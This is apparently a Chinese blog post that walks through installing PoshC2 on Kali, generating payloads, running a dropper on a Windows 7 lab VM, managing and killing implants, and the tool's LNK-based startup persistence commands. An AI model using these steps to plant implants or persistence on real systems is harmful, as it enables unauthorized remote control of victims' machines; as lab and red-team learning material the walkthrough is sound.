0 环境

系统:

Linux kali 5.9.0-kali1-amd64 #1 SMP Debian 5.9.1-1kali2 (2020-10-29) x86_64 GNU/Linux

项目地址(PoshC2-7.3.0):

https://github.com/nettitude/PoshC2

文档:

https://poshc2.readthedocs.io/en/latest/install_and_setup/index.html

1 安装

┌──(root💀kali)-[/home/kali/Desktop/PoshC2-7.3.0]
└─# sudo ./Install.sh

2 创建项目(默认创建的项目存在于 /var/poshc2/)

┌──(root💀kali)-[/home/kali/Desktop/PoshC2-7.3.0]
└─# posh-project -n howareyou
[+] Created Project: howareyou
[*] Now run posh-config to set your configuration

3 配置
┌──(root💀kali)-[/home/kali/Desktop/PoshC2-7.3.0]
└─# posh-config

4 启动(生成各种 payload,存在于 /var/poshc2/howareyou/payloads )
┌──(root💀kali)-[/home/kali/Desktop/PoshC2-7.3.0]
└─# posh-server

5 将其中的一个payload 移动到桌面,复制到win7虚拟机中运行(另外窗口)

┌──(root💀kali)-[/var/poshc2/howareyou/payloads]

└─# mv Posh_v2_dropper_migrate_x64.exe /home/kali/Desktop


6 创建用户(另外窗口)
┌──(root💀kali)-[/var/poshc2/howareyou/payloads]
└─# posh -u crashovverid

7 上线

8 交互

 9 交互显示

10 关闭会话并退出

 其他:

01 ####删除 会话
=============== PoshC2 Zip ===============

User: crashovverid

[5] : Seen:2021-02-01 20:16:01 | PID:2572 | 5s | URLID: 1 | WIN-NS5MF2INI14\win7 @ WIN-NS5MF2INI14 (AMD64) PS
[6] : Seen:2021-02-01 20:16:20 | PID:2580 | 5s | URLID: 1 | WIN-NS5MF2INI14\win7 @ WIN-NS5MF2INI14 (AMD64) PS
[8] : Seen:2021-02-01 21:09:06 | PID:2560 | 5s | URLID: 1 | WIN-NS5MF2INI14\win7 @ WIN-NS5MF2INI14 (AMD64) PS
[9] : Seen:2021-02-01 21:09:08 | PID:2720 | 5s | URLID: 1 | WIN-NS5MF2INI14\win7 @ WIN-NS5MF2INI14 (AMD64) PS

Select ImplantID or ALL or Comma Separated List (Enter to refresh):: 5,6,8,9
5,6,8,9> kill-implant
Are you sure you want to terminate the implant ID 5? (Y/n) Y
Are you sure you want to terminate the implant ID 6? (Y/n) Y
Are you sure you want to terminate the implant ID 8? (Y/n) Y
Are you sure you want to terminate the implant ID 9? (Y/n) Y

5,6,8,9> quit
Are you sure you want to quit? (Y/n) Y

┌──(root💀kali)-[/var/poshc2]
└─#

02 第二个窗口(创建用户进行交互)
posh -u crashoverride

//交互--示例
PoshC2可以创建一个LNK文件并将其直接放置在Windows启动文件夹中以保持持久性。可以通过执行以下命令来调用此技术:
* Persistence (with powershell.exe):
====================================
install-persistence 1,2,3
remove-persistence 1,2,3

 

相关链接:

Window权限维持(四):快捷方式
系统安全 Bypass007 2019-12-04 8,007
https://www.secpulse.com/archives/119973.html

 

posted on 2021-02-02 11:26  雨点点  阅读(947)  评论(3编辑  收藏  举报